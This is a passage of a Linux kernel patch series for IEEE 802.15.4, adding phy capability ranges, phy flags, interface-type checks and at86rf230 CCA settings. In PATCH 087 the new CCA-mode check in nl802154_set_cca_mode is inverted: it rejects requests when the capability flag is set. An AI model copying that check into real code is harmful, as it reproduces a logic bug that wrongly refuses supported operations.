channels_supported[IEEE802154_MAX_PAGE + 1]; + struct wpan_phy_supported supported; /* current transmit_power in mBm */ s32 transmit_power; struct wpan_phy_cca cca; diff --git a/net/ieee802154/nl-phy.c b/net/ieee802154/nl-phy.c index 346c6665d25e..cbc0d09351e0 100644 --- a/net/ieee802154/nl-phy.c +++ b/net/ieee802154/nl-phy.c @@ -56,8 +56,8 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, nla_put_u8(msg, IEEE802154_ATTR_CHANNEL, phy->current_channel)) goto nla_put_failure; for (i = 0; i < 32; i++) { - if (phy->channels_supported[i]) - buf[pages++] = phy->channels_supported[i] | (i << 27); + if (phy->supported.channels[i]) + buf[pages++] = phy->supported.channels[i] | (i << 27); } if (pages && nla_put(msg, IEEE802154_ATTR_CHANNEL_PAGE_LIST, diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index f3185c71af10..d271879a2174 100644 --- a/net/ieee802154/nl802154.c +++ 
b/net/ieee802154/nl802154.c @@ -248,7 +248,7 @@ nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, for (page = 0; page <= IEEE802154_MAX_PAGE; page++) { if (nla_put_u32(msg, NL802154_ATTR_SUPPORTED_CHANNEL, - rdev->wpan_phy.channels_supported[page])) + rdev->wpan_phy.supported.channels[page])) return -ENOBUFS; } nla_nest_end(msg, nl_page); @@ -626,7 +626,7 @@ static int nl802154_set_channel(struct sk_buff *skb, struct genl_info *info) /* check 802.15.4 constraints */ if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL || - !(rdev->wpan_phy.channels_supported[page] & BIT(channel))) + !(rdev->wpan_phy.supported.channels[page] & BIT(channel))) return -EINVAL; return rdev_set_channel(rdev, page, channel); From fea3318d20776a94afeea0460c6ee9904e60569e Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:43 +0200 Subject: [PATCH 084/872] ieee802154: add several phy supported handling This patch adds support for phy supported handling for all other already existing handling 802.15.4 functionality. We assume now a fully 802.15.4 complaint transceiver at phy allocation. If a transceiver can support 802.15.4 default values only, then the values should be overwirtten by values the transceiver supports. If the transceiver doesn't set the according hardware flags, we assume the 802.15.4 defaults now which cannot be changed. Signed-off-by: Alexander Aring Suggested-by: Phoebe Buckheister Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 26 +++++++++++++++++++++++++- include/net/nl802154.h | 22 ++++++++++++++++++++++ net/ieee802154/nl802154.c | 22 +++++++++++++++++----- net/mac802154/main.c | 26 ++++++++++++++++++++++++++ 4 files changed, 90 insertions(+), 6 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 1941d7a79219..23abd08a310a 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -61,8 +61,32 @@ struct cfg802154_ops { struct wpan_dev *wpan_dev, bool mode); }; +static inline bool +wpan_phy_supported_bool(bool b, enum nl802154_supported_bool_states st) +{ + switch (st) { + case NL802154_SUPPORTED_BOOL_TRUE: + return b; + case NL802154_SUPPORTED_BOOL_FALSE: + return !b; + case NL802154_SUPPORTED_BOOL_BOTH: + return true; + default: + WARN_ON(1); + } + + return false; +} + struct wpan_phy_supported { - u32 channels[IEEE802154_MAX_PAGE + 1]; + u32 channels[IEEE802154_MAX_PAGE + 1], + cca_modes, cca_opts; + enum nl802154_supported_bool_states lbt; + u8 min_minbe, max_minbe, min_maxbe, max_maxbe, + min_csma_backoffs, max_csma_backoffs; + s8 min_frame_retries, max_frame_retries; + size_t tx_powers_size, cca_ed_levels_size; + const s32 *tx_powers, *cca_ed_levels; }; struct wpan_phy_cca { diff --git a/include/net/nl802154.h b/include/net/nl802154.h index f8b5bc997959..055277156eef 100644 --- a/include/net/nl802154.h +++ b/include/net/nl802154.h @@ -162,4 +162,26 @@ enum nl802154_cca_opts { NL802154_CCA_OPT_ATTR_MAX = __NL802154_CCA_OPT_ATTR_AFTER_LAST - 1 }; +/** + * enum nl802154_supported_bool_states - bool states for bool capability entry + * + * @NL802154_SUPPORTED_BOOL_FALSE: indicates to set false + * @NL802154_SUPPORTED_BOOL_TRUE: indicates to set true + * @__NL802154_SUPPORTED_BOOL_INVALD: reserved + * @NL802154_SUPPORTED_BOOL_BOTH: indicates to set true and false + * @__NL802154_SUPPORTED_BOOL_AFTER_LAST: Internal + * @NL802154_SUPPORTED_BOOL_MAX: highest value for bool states + */ +enum nl802154_supported_bool_states { + NL802154_SUPPORTED_BOOL_FALSE, + 
NL802154_SUPPORTED_BOOL_TRUE, + /* to handle them in a mask */ + __NL802154_SUPPORTED_BOOL_INVALD, + NL802154_SUPPORTED_BOOL_BOTH, + + /* keep last */ + __NL802154_SUPPORTED_BOOL_AFTER_LAST, + NL802154_SUPPORTED_BOOL_MAX = __NL802154_SUPPORTED_BOOL_AFTER_LAST - 1 +}; + #endif /* __NL802154_H */ diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index d271879a2174..fa0c4048b0e8 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -642,7 +642,9 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) cca.mode = nla_get_u32(info->attrs[NL802154_ATTR_CCA_MODE]); /* checking 802.15.4 constraints */ - if (cca.mode < NL802154_CCA_ENERGY || cca.mode > NL802154_CCA_ATTR_MAX) + if (cca.mode < NL802154_CCA_ENERGY || + cca.mode > NL802154_CCA_ATTR_MAX || + !(rdev->wpan_phy.supported.cca_modes & BIT(cca.mode))) return -EINVAL; if (cca.mode == NL802154_CCA_ENERGY_CARRIER) { @@ -650,7 +652,8 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return -EINVAL; cca.opt = nla_get_u32(info->attrs[NL802154_ATTR_CCA_OPT]); - if (cca.opt > NL802154_CCA_OPT_ATTR_MAX) + if (cca.opt > NL802154_CCA_OPT_ATTR_MAX || + !(rdev->wpan_phy.supported.cca_opts & BIT(cca.opt))) return -EINVAL; } @@ -744,7 +747,11 @@ nl802154_set_backoff_exponent(struct sk_buff *skb, struct genl_info *info) max_be = nla_get_u8(info->attrs[NL802154_ATTR_MAX_BE]); /* check 802.15.4 constraints */ - if (max_be < 3 || max_be > 8 || min_be > max_be) + if (min_be < rdev->wpan_phy.supported.min_minbe || + min_be > rdev->wpan_phy.supported.max_minbe || + max_be < rdev->wpan_phy.supported.min_maxbe || + max_be > rdev->wpan_phy.supported.max_maxbe || + min_be > max_be) return -EINVAL; return rdev_set_backoff_exponent(rdev, wpan_dev, min_be, max_be); @@ -769,7 +776,8 @@ nl802154_set_max_csma_backoffs(struct sk_buff *skb, struct genl_info *info) info->attrs[NL802154_ATTR_MAX_CSMA_BACKOFFS]); /* check 802.15.4 constraints */ - if (max_csma_backoffs > 5) + if (max_csma_backoffs < rdev->wpan_phy.supported.min_csma_backoffs || + max_csma_backoffs > rdev->wpan_phy.supported.max_csma_backoffs) return -EINVAL; return rdev_set_max_csma_backoffs(rdev, wpan_dev, max_csma_backoffs); @@ -793,7 +801,8 @@ nl802154_set_max_frame_retries(struct sk_buff *skb, struct genl_info *info) info->attrs[NL802154_ATTR_MAX_FRAME_RETRIES]); /* check 802.15.4 constraints */ - if (max_frame_retries < -1 || max_frame_retries > 7) + if (max_frame_retries < rdev->wpan_phy.supported.min_frame_retries || + max_frame_retries > rdev->wpan_phy.supported.max_frame_retries) return -EINVAL; return rdev_set_max_frame_retries(rdev, wpan_dev, max_frame_retries); @@ -813,6 +822,9 @@ static int nl802154_set_lbt_mode(struct sk_buff *skb, struct genl_info *info) return -EINVAL; mode = !!nla_get_u8(info->attrs[NL802154_ATTR_LBT_MODE]); + if (!wpan_phy_supported_bool(mode, rdev->wpan_phy.supported.lbt)) + return -EINVAL; + return rdev_set_lbt_mode(rdev, wpan_dev, mode); } diff --git a/net/mac802154/main.c b/net/mac802154/main.c index 08cb32dc8fd3..ddcd6ff8d39c 100644 --- a/net/mac802154/main.c +++ b/net/mac802154/main.c @@ -107,6 +107,15 @@ ieee802154_alloc_hw(size_t priv_data_len, const struct ieee802154_ops *ops) skb_queue_head_init(&local->skb_queue); + /* init supported flags with 802.15.4 default ranges */ + phy->supported.max_minbe = 8; + phy->supported.min_maxbe = 3; + phy->supported.max_maxbe = 8; + phy->supported.min_frame_retries = -1; + phy->supported.max_frame_retries = 7; + 
phy->supported.max_csma_backoffs = 5; + phy->supported.lbt = NL802154_SUPPORTED_BOOL_FALSE; + return &local->hw; } EXPORT_SYMBOL(ieee802154_alloc_hw); @@ -155,6 +164,23 @@ int ieee802154_register_hw(struct ieee802154_hw *hw) ieee802154_setup_wpan_phy_pib(local->phy); + if (!(hw->flags & IEEE802154_HW_CSMA_PARAMS)) { + local->phy->supported.min_csma_backoffs = 4; + local->phy->supported.max_csma_backoffs = 4; + local->phy->supported.min_maxbe = 5; + local->phy->supported.max_maxbe = 5; + local->phy->supported.min_minbe = 3; + local->phy->supported.max_minbe = 3; + } + + if (!(hw->flags & IEEE802154_HW_FRAME_RETRIES)) { + /* TODO should be 3, but our default value is -1 which means + * no ARET handling. + */ + local->phy->supported.min_frame_retries = -1; + local->phy->supported.max_frame_retries = -1; + } + rc = wpan_phy_register(local->phy); if (rc < 0) goto out_wq; From 791021bf13ec9d0fc14bfd8c9c4b368ace568239 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:44 +0200 Subject: [PATCH 085/872] mac802154: check for really changes This patch adds check if the value is really changed inside pib/mib. If a transceiver do support only one value for e.g. max_be then this will also handle that the driver layer doesn't need to care about handling to set one value only. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 12 ++++++++++++ net/mac802154/cfg.c | 26 ++++++++++++++++++++++++++ 2 files changed, 38 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 23abd08a310a..37abc1603285 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -94,6 +94,18 @@ struct wpan_phy_cca { enum nl802154_cca_opts opt; }; +static inline bool +wpan_phy_cca_cmp(const struct wpan_phy_cca *a, const struct wpan_phy_cca *b) +{ + if (a->mode != b->mode) + return false; + + if (a->mode == NL802154_CCA_ENERGY_CARRIER) + return a->opt == b->opt; + + return true; +} + struct wpan_phy { struct mutex pib_lock; diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index c63601582c71..45c4dc39766e 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -73,6 +73,10 @@ ieee802154_set_channel(struct wpan_phy *wpan_phy, u8 page, u8 channel) ASSERT_RTNL(); + if (wpan_phy->current_page == page && + wpan_phy->current_channel == channel) + return 0; + ret = drv_set_channel(local, page, channel); if (!ret) { wpan_phy->current_page = page; @@ -91,6 +95,9 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_phy_cca_cmp(&wpan_phy->cca, cca)) + return 0; + /* check if phy support this setting */ if (!(local->hw.flags & IEEE802154_HW_CCA_MODE)) return -EOPNOTSUPP; @@ -108,6 +115,9 @@ ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); + if (wpan_dev->pan_id == pan_id) + return 0; + wpan_dev->pan_id = pan_id; return 0; } @@ -121,6 +131,10 @@ ieee802154_set_backoff_exponent(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->min_be == min_be && + wpan_dev->max_be == max_be) + return 0; + if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) return -EOPNOTSUPP; @@ -135,6 +149,9 @@ ieee802154_set_short_addr(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); + if (wpan_dev->short_addr == short_addr) + return 0; + wpan_dev->short_addr = short_addr; return 0; } @@ -148,6 +165,9 @@ ieee802154_set_max_csma_backoffs(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->csma_retries == max_csma_backoffs) + return 0; + if (!(local->hw.flags & 
IEEE802154_HW_CSMA_PARAMS)) return -EOPNOTSUPP; @@ -164,6 +184,9 @@ ieee802154_set_max_frame_retries(struct wpan_phy *wpan_phy, ASSERT_RTNL(); + if (wpan_dev->frame_retries == max_frame_retries) + return 0; + if (!(local->hw.flags & IEEE802154_HW_FRAME_RETRIES)) return -EOPNOTSUPP; @@ -179,6 +202,9 @@ ieee802154_set_lbt_mode(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, ASSERT_RTNL(); + if (wpan_dev->lbt == mode) + return 0; + if (!(local->hw.flags & IEEE802154_HW_LBT)) return -EOPNOTSUPP; From 8329fcf11f5c2ae2fb7b1f56f05b0bb899babc85 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:45 +0200 Subject: [PATCH 086/872] mac802154: remove check if operation is supported This patch removes the check if operation is supported by driver layer. This is done now by capabilities flags, if these are valid then the driver should support the operation, otherwise a WARN_ON occurs. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/cfg.c | 24 ------------------------ 1 file changed, 24 deletions(-) diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index 45c4dc39766e..d5290ea49dca 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -98,10 +98,6 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, if (wpan_phy_cca_cmp(&wpan_phy->cca, cca)) return 0; - /* check if phy support this setting */ - if (!(local->hw.flags & IEEE802154_HW_CCA_MODE)) - return -EOPNOTSUPP; - ret = drv_set_cca_mode(local, cca); if (!ret) wpan_phy->cca = *cca; @@ -127,17 +123,12 @@ ieee802154_set_backoff_exponent(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, u8 min_be, u8 max_be) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->min_be == min_be && wpan_dev->max_be == max_be) return 0; - if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) - return -EOPNOTSUPP; - wpan_dev->min_be = min_be; wpan_dev->max_be = max_be; return 0; @@ -161,16 +152,11 @@ ieee802154_set_max_csma_backoffs(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, u8 max_csma_backoffs) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->csma_retries == max_csma_backoffs) return 0; - if (!(local->hw.flags & IEEE802154_HW_CSMA_PARAMS)) - return -EOPNOTSUPP; - wpan_dev->csma_retries = max_csma_backoffs; return 0; } @@ -180,16 +166,11 @@ ieee802154_set_max_frame_retries(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, s8 max_frame_retries) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->frame_retries == max_frame_retries) return 0; - if (!(local->hw.flags & IEEE802154_HW_FRAME_RETRIES)) - return -EOPNOTSUPP; - wpan_dev->frame_retries = max_frame_retries; return 0; } @@ -198,16 +179,11 @@ static int ieee802154_set_lbt_mode(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, bool mode) { - struct ieee802154_local *local = wpan_phy_priv(wpan_phy); - ASSERT_RTNL(); if (wpan_dev->lbt == mode) return 0; - if (!(local->hw.flags & IEEE802154_HW_LBT)) - return -EOPNOTSUPP; - wpan_dev->lbt = mode; return 0; } From edea8f7c75ec6c238130bd7e74d9f6f4c26e97b0 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:46 +0200 Subject: [PATCH 087/872] cfg802154: introduce wpan phy flags This patch introduce a flag property for the wpan phy structure. The current flag settings in ieee802154_hw are accessable in mac802154 layer only which is okay for flags which indicates MAC handling which are done by phy. 
For real PHY layer settings like cca mode, transmit power, cca energy detection level. The difference between these flags are that the MAC handling flags are only handled in mac802154/HardMac layer e.g. on an interface up. The phy settings are direct netlink calls from nl802154 into the driver layer and the nl802154 need to have a chance to check if the driver supports this handling before sending to the next layer. We also check now on PHY flags while dumping and setting pib attributes. In comparing with MIB attributes the 802.15.4 gives us an default value which we assume when a transceiver implement less functionality. In case of MIB settings the nl802154 layer doesn't need to check on the ieee802154_hw flags then. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 9 +++++++-- include/net/cfg802154.h | 16 ++++++++++++++++ include/net/mac802154.h | 29 +++++++---------------------- net/ieee802154/nl802154.c | 27 +++++++++++++++++---------- net/mac802154/mac_cmd.c | 6 +++--- 5 files changed, 50 insertions(+), 37 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 151d57f4320d..b0ffd1cd0010 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1566,8 +1566,13 @@ at86rf230_detect_device(struct at86rf230_local *lp) } lp->hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AACK | - IEEE802154_HW_TXPOWER | IEEE802154_HW_ARET | - IEEE802154_HW_AFILT | IEEE802154_HW_PROMISCUOUS; + IEEE802154_HW_CSMA_PARAMS | + IEEE802154_HW_FRAME_RETRIES | IEEE802154_HW_AFILT | + IEEE802154_HW_PROMISCUOUS; + + lp->hw->phy->flags = WPAN_PHY_FLAG_TXPOWER | + WPAN_PHY_FLAG_CCA_ED_LEVEL | + WPAN_PHY_FLAG_CCA_MODE; lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 37abc1603285..a12c6c5247e9 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -106,6 +106,20 @@ wpan_phy_cca_cmp(const struct wpan_phy_cca *a, const struct wpan_phy_cca *b) return true; } +/** + * @WPAN_PHY_FLAG_TRANSMIT_POWER: Indicates that transceiver will support + * transmit power setting. + * @WPAN_PHY_FLAG_CCA_ED_LEVEL: Indicates that transceiver will support cca ed + * level setting. + * @WPAN_PHY_FLAG_CCA_MODE: Indicates that transceiver will support cca mode + * setting. + */ +enum wpan_phy_flags { + WPAN_PHY_FLAG_TXPOWER = BIT(1), + WPAN_PHY_FLAG_CCA_ED_LEVEL = BIT(2), + WPAN_PHY_FLAG_CCA_MODE = BIT(3), +}; + struct wpan_phy { struct mutex pib_lock; @@ -117,6 +131,8 @@ struct wpan_phy { */ const void *privid; + u32 flags; + /* * This is a PIB according to 802.15.4-2011. * We do not provide timing-related variables, as they diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 71e245605ef8..9605c7f7453f 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -89,41 +89,26 @@ struct ieee802154_hw { #define IEEE802154_HW_TX_OMIT_CKSUM 0x00000001 /* Indicates that receiver will autorespond with ACK frames. */ #define IEEE802154_HW_AACK 0x00000002 -/* Indicates that transceiver will support transmit power setting. */ -#define IEEE802154_HW_TXPOWER 0x00000004 /* Indicates that transceiver will support listen before transmit. */ -#define IEEE802154_HW_LBT 0x00000008 -/* Indicates that transceiver will support cca mode setting. */ -#define IEEE802154_HW_CCA_MODE 0x00000010 -/* Indicates that transceiver will support cca ed level setting. 
*/ -#define IEEE802154_HW_CCA_ED_LEVEL 0x00000020 +#define IEEE802154_HW_LBT 0x00000004 /* Indicates that transceiver will support csma (max_be, min_be, csma retries) * settings. */ -#define IEEE802154_HW_CSMA_PARAMS 0x00000040 +#define IEEE802154_HW_CSMA_PARAMS 0x00000008 /* Indicates that transceiver will support ARET frame retries setting. */ -#define IEEE802154_HW_FRAME_RETRIES 0x00000080 +#define IEEE802154_HW_FRAME_RETRIES 0x00000010 /* Indicates that transceiver will support hardware address filter setting. */ -#define IEEE802154_HW_AFILT 0x00000100 +#define IEEE802154_HW_AFILT 0x00000020 /* Indicates that transceiver will support promiscuous mode setting. */ -#define IEEE802154_HW_PROMISCUOUS 0x00000200 +#define IEEE802154_HW_PROMISCUOUS 0x00000040 /* Indicates that receiver omits FCS. */ -#define IEEE802154_HW_RX_OMIT_CKSUM 0x00000400 +#define IEEE802154_HW_RX_OMIT_CKSUM 0x00000080 /* Indicates that receiver will not filter frames with bad checksum. */ -#define IEEE802154_HW_RX_DROP_BAD_CKSUM 0x00000800 +#define IEEE802154_HW_RX_DROP_BAD_CKSUM 0x00000100 /* Indicates that receiver omits FCS and xmitter will add FCS on it's own. */ #define IEEE802154_HW_OMIT_CKSUM (IEEE802154_HW_TX_OMIT_CKSUM | \ IEEE802154_HW_RX_OMIT_CKSUM) -/* This groups the most common CSMA support fields into one. */ -#define IEEE802154_HW_CSMA (IEEE802154_HW_CCA_MODE | \ - IEEE802154_HW_CCA_ED_LEVEL | \ - IEEE802154_HW_CSMA_PARAMS) - -/* This groups the most common ARET support fields into one. */ -#define IEEE802154_HW_ARET (IEEE802154_HW_CSMA | \ - IEEE802154_HW_FRAME_RETRIES) - /* struct ieee802154_ops - callbacks from mac802154 to the driver * * This structure contains various callbacks that the driver may diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index fa0c4048b0e8..40fb0be009b2 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -291,19 +291,23 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; /* cca mode */ - if (nla_put_u32(msg, NL802154_ATTR_CCA_MODE, - rdev->wpan_phy.cca.mode)) - goto nla_put_failure; - - if (rdev->wpan_phy.cca.mode == NL802154_CCA_ENERGY_CARRIER) { - if (nla_put_u32(msg, NL802154_ATTR_CCA_OPT, - rdev->wpan_phy.cca.opt)) + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) { + if (nla_put_u32(msg, NL802154_ATTR_CCA_MODE, + rdev->wpan_phy.cca.mode)) goto nla_put_failure; + + if (rdev->wpan_phy.cca.mode == NL802154_CCA_ENERGY_CARRIER) { + if (nla_put_u32(msg, NL802154_ATTR_CCA_OPT, + rdev->wpan_phy.cca.opt)) + goto nla_put_failure; + } } - if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, - rdev->wpan_phy.transmit_power)) - goto nla_put_failure; + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER) { + if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, + rdev->wpan_phy.transmit_power)) + goto nla_put_failure; + } finish: genlmsg_end(msg, hdr); @@ -637,6 +641,9 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) struct cfg802154_registered_device *rdev = info->user_ptr[0]; struct wpan_phy_cca cca; + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) + return -EOPNOTSUPP; + if (!info->attrs[NL802154_ATTR_CCA_MODE]) return -EINVAL; diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index bdccb4ecd30f..6dcbb3b5994c 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -91,19 +91,19 @@ static int mac802154_set_mac_params(struct net_device *dev, wpan_dev->frame_retries = params->frame_retries; wpan_dev->lbt = params->lbt; - if (local->hw.flags & 
IEEE802154_HW_TXPOWER) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_TXPOWER) { ret = drv_set_tx_power(local, params->transmit_power); if (ret < 0) return ret; } - if (local->hw.flags & IEEE802154_HW_CCA_MODE) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_CCA_MODE) { ret = drv_set_cca_mode(local, ¶ms->cca); if (ret < 0) return ret; } - if (local->hw.flags & IEEE802154_HW_CCA_ED_LEVEL) { + if (local->hw.phy->flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { ret = drv_set_cca_ed_level(local, params->cca_ed_level); if (ret < 0) return ret; From 65318680c97cca15e3678148b3a5acaa33e991ec Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:47 +0200 Subject: [PATCH 088/872] ieee802154: add iftypes capability This patch adds capability flags for supported interface types. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 2 +- net/ieee802154/nl802154.c | 3 ++- net/mac802154/main.c | 6 ++++++ 3 files changed, 9 insertions(+), 2 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index a12c6c5247e9..11bbf17ad865 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -80,7 +80,7 @@ wpan_phy_supported_bool(bool b, enum nl802154_supported_bool_states st) struct wpan_phy_supported { u32 channels[IEEE802154_MAX_PAGE + 1], - cca_modes, cca_opts; + cca_modes, cca_opts, iftypes; enum nl802154_supported_bool_states lbt; u8 min_minbe, max_minbe, min_maxbe, max_maxbe, min_csma_backoffs, max_csma_backoffs; diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 40fb0be009b2..3afb20e43ff8 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -579,7 +579,8 @@ static int nl802154_new_interface(struct sk_buff *skb, struct genl_info *info) if (info->attrs[NL802154_ATTR_IFTYPE]) { type = nla_get_u32(info->attrs[NL802154_ATTR_IFTYPE]); - if (type > NL802154_IFTYPE_MAX) + if (type > NL802154_IFTYPE_MAX || + !(rdev->wpan_phy.supported.iftypes & BIT(type))) return -EINVAL; } diff --git a/net/mac802154/main.c b/net/mac802154/main.c index ddcd6ff8d39c..356b346e1ee8 100644 --- a/net/mac802154/main.c +++ b/net/mac802154/main.c @@ -116,6 +116,9 @@ ieee802154_alloc_hw(size_t priv_data_len, const struct ieee802154_ops *ops) phy->supported.max_csma_backoffs = 5; phy->supported.lbt = NL802154_SUPPORTED_BOOL_FALSE; + /* always supported */ + phy->supported.iftypes = BIT(NL802154_IFTYPE_NODE); + return &local->hw; } EXPORT_SYMBOL(ieee802154_alloc_hw); @@ -181,6 +184,9 @@ int ieee802154_register_hw(struct ieee802154_hw *hw) local->phy->supported.max_frame_retries = -1; } + if (hw->flags & IEEE802154_HW_PROMISCUOUS) + local->phy->supported.iftypes |= BIT(NL802154_IFTYPE_MONITOR); + rc = wpan_phy_register(local->phy); if (rc < 0) goto out_wq; From 8377d22c0385b4a08ddeb1029b80674eb5db38b4 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:48 +0200 Subject: [PATCH 089/872] at86rf230: set cca_modes supported flags This patch sets the at86rf230 supported cca modes. In case of at86rf212 it also can support listen before transmit. 
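With these capability masks a driver states at probe time which CCA modes and options its hardware implements, and nl802154 (see PATCH 084) rejects any requested mode whose bit is not set in supported.cca_modes before calling into the driver. A hedged sketch of that pattern for a hypothetical driver; only the function name and the "hw" plumbing are invented, the fields and NL802154_* constants are the ones used in this series:

#include <linux/bitops.h>
#include <net/cfg802154.h>
#include <net/mac802154.h>
#include <net/nl802154.h>

/* Hypothetical probe fragment: advertise which CCA modes/options the
 * hardware implements so nl802154 can filter requests early.
 */
static void foo_advertise_cca(struct ieee802154_hw *hw)
{
	hw->phy->flags |= WPAN_PHY_FLAG_CCA_MODE;
	hw->phy->supported.cca_modes = BIT(NL802154_CCA_ENERGY) |
				       BIT(NL802154_CCA_CARRIER) |
				       BIT(NL802154_CCA_ENERGY_CARRIER);
	hw->phy->supported.cca_opts = BIT(NL802154_CCA_OPT_ENERGY_CARRIER_AND) |
				      BIT(NL802154_CCA_OPT_ENERGY_CARRIER_OR);
}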
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index b0ffd1cd0010..fabde3ac49b3 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1574,6 +1574,11 @@ at86rf230_detect_device(struct at86rf230_local *lp) WPAN_PHY_FLAG_CCA_ED_LEVEL | WPAN_PHY_FLAG_CCA_MODE; + lp->hw->phy->supported.cca_modes = BIT(NL802154_CCA_ENERGY) | + BIT(NL802154_CCA_CARRIER) | BIT(NL802154_CCA_ENERGY_CARRIER); + lp->hw->phy->supported.cca_opts = BIT(NL802154_CCA_OPT_ENERGY_CARRIER_AND) | + BIT(NL802154_CCA_OPT_ENERGY_CARRIER_OR); + lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; switch (part) { @@ -1596,6 +1601,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[2] = 0x00007FF; lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; + lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; break; case 11: chip = "at86rf233"; From 6f4da3f897906d0e1f27e3e44bd445f8e6d7bd85 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:49 +0200 Subject: [PATCH 090/872] at86rf230: rework tx power support This patch adds support for get transmit power levels and reworks the set of transmit power levels which was broken before. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 83 +++++++++++++++++++++++------- 1 file changed, 64 insertions(+), 19 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index fabde3ac49b3..dff7e47f5afb 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -51,6 +51,7 @@ struct at86rf2xx_chip_data { int (*set_channel)(struct at86rf230_local *, u8, u8); int 